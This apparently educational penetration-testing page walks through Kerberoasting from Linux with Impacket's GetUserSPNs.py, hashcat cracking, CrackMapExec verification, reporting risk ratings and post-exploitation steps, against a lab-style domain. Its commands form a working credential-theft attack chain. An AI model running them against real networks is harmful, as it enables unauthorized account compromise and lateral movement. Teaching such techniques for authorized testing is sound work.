Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Kerberoasting - from Linux

Kerberoasting from a Linux attack host using Impacket’s GetUserSPNs.py. Requires valid domain credentials (cleartext password or NTLM hash) and the IP of a Domain Controller.

Kerberoasting Overview

Kerberoasting targets Service Principal Name (SPN) accounts by requesting TGS tickets encrypted with the service account’s NTLM hash, then cracking them offline. Any domain user can request a TGS ticket for any service account in the same domain (and across forest trusts if authentication is permitted).

Why It Works

  • Domain accounts running services are often local admins or members of privileged groups (Domain Admins, either directly or via nested membership)
  • Service accounts frequently have weak or reused passwords to simplify administration
  • The TGS ticket (TGS-REP) is encrypted with the service account’s NTLM hash — crackable offline with no interaction with the target
  • Even a low-privilege cracked account can be useful: if the SPN is MSSQL/SRV01, you get sysadmin access to that SQL instance and can enable xp_cmdshell for code execution

Prerequisites

RequirementDetails
Domain user credentialsCleartext password, NTLM hash, or Kerberos ticket
Domain Controller IPTarget for LDAP queries and ticket requests
Network accessAbility to reach the DC on Kerberos (88) and LDAP (389/636)

Attack Positions

  • From a non-domain-joined Linux host with valid domain credentials
  • From a domain-joined Linux host as root (via keytab file)
  • From a domain-joined Windows host (as domain user, domain account shell, or SYSTEM)
  • From a non-domain-joined Windows host using runas /netonly

Performing the Attack with GetUserSPNs.py

Install Impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 -m pip install .

Enumerate SPN Accounts

List all SPN accounts with their group memberships and password age:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

Output shows SPN, account name, group membership, and password last set date. Focus on accounts that are members of Domain Admins or other privileged groups — these are high-value targets.

Request All TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Outputs all TGS hashes in Hashcat/John-compatible format directly to the terminal.

Request a Single User’s TGS Ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Save Hashes to a File

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

Authenticate with an NTLM Hash

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -hashes :NTLM_HASH -request

Cracking TGS Tickets

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

TGS tickets take longer to crack than NTLM hashes. If the service account has a strong password, cracking may be infeasible even with a GPU rig.

Verifying Cracked Credentials

Confirm access with CrackMapExec:

sudo crackmapexec smb 172.16.5.5 -u sqldev -p 'database!'

(Pwn3d!) in the output confirms admin-level access on the target.

Efficacy & Reporting

The value of Kerberoasting findings depends on what you crack:

ScenarioRisk RatingRationale
Cracked ticket leads to Domain AdminHighDirect path to domain compromise
Cracked ticket gives useful lateral movementHighExpands access, contributes to attack chain
Tickets cracked but no privileged access gainedHighWeak service account passwords are still exploitable
No tickets cracked despite extended effortMediumSPNs exist (risk), but strong passwords mitigate impact

Even when no tickets crack, report the finding — strong passwords can always be changed to weak ones, and a determined attacker with better hardware may succeed.

Post-Exploitation with Cracked Credentials

Once service account passwords are obtained:

  • Access hosts via RDP or WinRM as a local user/admin
  • Remote admin via PsExec or similar tools
  • Access sensitive file shares
  • MSSQL access as DBA for privilege escalation (xp_cmdshell)
  • Continue domain enumeration for further attack paths